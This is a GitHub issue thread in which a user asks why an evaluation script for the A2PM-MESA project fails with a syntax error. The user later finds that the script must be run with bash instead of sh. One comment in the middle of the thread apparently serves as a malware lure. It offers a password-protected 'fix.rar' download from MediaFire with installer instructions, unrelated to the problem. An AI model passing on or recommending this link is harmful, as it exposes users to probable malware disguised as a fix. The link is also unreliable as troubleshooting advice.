### ISSUE TITLE
No file or directory for pose_err_names.txt

### ISSUE THREAD

**Issue by RealNewNoob** [Easonyesheng/A2PM-MESA#2]
Hi MESA team! Thanks for this innovative work!
I am trying to run the `sh scripts/dmesa-dkm-sn.sh` and I notice that `a already_done_name_file` is required. I assume it is used to continue running the evaluation after a stop.

Directly run the shell complaints `could not find the file`. So I created an empty pose_err_names.txt file at the dir and got error
`Syntax error: "(" unexpected (expecting "done")`
It is because the pose_err_names.txt is empty? How should I set it up?

I am not familiar with bash

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by RealNewNoob** [comment]
I downloaded the file and tried to open it, but it told me, `An error occurred while loading the archive.`
Running `gcc --version` in my terminal returns `gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0`

**Comment by RealNewNoob** [comment]
It should be run with `bash` instead of `sh`
